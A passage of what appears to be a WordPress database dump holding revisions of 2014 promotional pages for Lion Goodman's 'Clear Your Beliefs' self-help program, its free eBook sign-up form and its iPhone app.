Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em style="margin-left: -6px;">What do I want to experience?</em>\n<em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em>\n<em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center;margin: 0px 5%">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-20 21:19:55', '2014-11-21 02:19:55', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(2019, 2, '2014-12-12 01:14:00', '2014-12-12 06:14:00', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_FINAL-246x300.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center;margin-top: 32px"><strong>Download the Free App</strong>for iPhone &amp; iPad</p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center;font-size: 14px;margin-bottom: -4px;padding:0 5px">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center;font-size: 14px;margin-bottom: -4px;padding:0 5px">FREE (for a limited time)</p>\nComplete Program\n<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><strong>Clear Your Limiting\nand Negative Beliefs</strong> <strong>\n- Permanently!</strong>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em style="margin-left: -6px;">What do I want to experience?</em>\n<em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em>\n<em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home - Clear your Beliefs - use this', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-12-12 01:14:00', '2014-12-12 06:14:00', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1851, 2, '2014-11-25 11:43:24', '2014-11-25 16:43:24', '', 'iclearit-App-logo_600', '', 'inherit', 'closed', 'open', '', 'iclearit-app-logo_600', '', '', '2014-11-25 11:43:24', '2014-11-25 16:43:24', '', 1450, 'http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_600.jpg', 0, 'attachment', 'image/jpeg', 0),
(1852, 2, '2014-11-25 11:44:52', '2014-11-25 16:44:52', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_600-260x300.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center;margin-top: 30px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center;font-size: 14px;margin-bottom: -2px;padding:0 5px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><strong>Clear Your Limiting\nand Negative Beliefs</strong> <strong>\n- Permanently!</strong>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em style="margin-left: -6px;">What do I want to experience?</em>\n<em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em>\n<em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-25 11:44:52', '2014-11-25 16:44:52', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1853, 2, '2014-11-25 11:46:16', '2014-11-25 16:46:16', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_600-260x300.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center;margin-top: 32px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center;font-size: 14px;margin-bottom: -2px;padding:0 5px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><strong>Clear Your Limiting\nand Negative Beliefs</strong> <strong>\n- Permanently!</strong>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em style="margin-left: -6px;">What do I want to experience?</em>\n<em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em>\n<em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-25 11:46:16', '2014-11-25 16:46:16', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1856, 2, '2014-11-30 18:17:50', '2014-11-30 23:17:50', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h1>\r\nGet a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook1.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook1.png" alt="ebook" width="1" height="1" class="aligncenter size-medium wp-image-1475" /></a>\r\nThis multimedia eBook details the wisdom behind the <em>Clear Your Beliefs</em> process, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email confirming your address, and then you''ll get immediate access to the downloadable book.  You’ll also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.  [Your contact information will never be shared, and you can un-subscribe anytime.]\r\n\r\nWe look forward to staying connected. If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support</a>\r\n.  \r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><center><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></center></div>', 'Free eBook:  Clear Your Beliefs!', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-11-30 18:17:50', '2014-11-30 23:17:50', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(1858, 2, '2014-11-30 18:23:03', '2014-11-30 23:23:03', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h1>\r\nWe would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.\r\n\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\nYou will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.\r\n\r\nIf we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support</a> We look forward to staying connected.\r\n\r\n[Note: Your contact information will never be shared, and you can un-subscribe anytime.]\r\n.\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><center><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></center></div>', 'Free eBook:  Clear Your Beliefs!', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-11-30 18:23:03', '2014-11-30 23:23:03', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(1857, 2, '2014-11-30 18:21:41', '2014-11-30 23:21:41', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h1>\r\n\r\n\r\nWe would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook1.png">\r\n\r\n<img src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook1.png" alt="ebook" width="1" height="1" class="aligncenter size-medium wp-image-1475" /></a>\r\n\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book. \r\n\r\nYou will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.  [Note: Your contact information will never be shared, and you can un-subscribe anytime.]\r\n\r\nIf we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support</a>  We look forward to staying connected.\r\n.  \r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><center><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></center></div>', 'Free eBook:  Clear Your Beliefs!', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-11-30 18:21:41', '2014-11-30 23:21:41', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(1859, 2, '2014-11-30 18:23:42', '2014-11-30 23:23:42', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />         Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h1>\r\nWe would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.\r\n\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\nYou will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.\r\n\r\nIf we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support</a> We look forward to staying connected.\r\n\r\n[Note: Your contact information will never be shared, and you can un-subscribe anytime.]\r\n.\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><center><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></center></div>', 'Free eBook:  Clear Your Beliefs!', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-11-30 18:23:42', '2014-11-30 23:23:42', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(1860, 2, '2014-11-30 18:24:36', '2014-11-30 23:24:36', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />         Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h1>\r\nWe would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.\r\n\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\nYou will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.\r\n\r\nIf we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.\r\n\r\n[Note: Your contact information will never be shared, and you can un-subscribe anytime.]\r\n.\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><center><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></center></div>', 'Free eBook:  Clear Your Beliefs!', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-11-30 18:24:36', '2014-11-30 23:24:36', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(1862, 2, '2014-12-02 12:41:26', '2014-12-02 17:41:26', '', 'iclearit-App-logo_FINAL', '', 'inherit', 'closed', 'open', '', 'iclearit-app-logo_final', '', '', '2014-12-02 12:41:26', '2014-12-02 17:41:26', '', 1450, 'http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_FINAL.jpg', 0, 'attachment', 'image/jpeg', 0),
(1863, 2, '2014-12-02 12:42:58', '2014-12-02 17:42:58', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_FINAL-246x300.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center;margin-top: 32px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center;font-size: 14px;margin-bottom: -2px;padding:0 5px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><strong>Clear Your Limiting\nand Negative Beliefs</strong> <strong>\n- Permanently!</strong>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 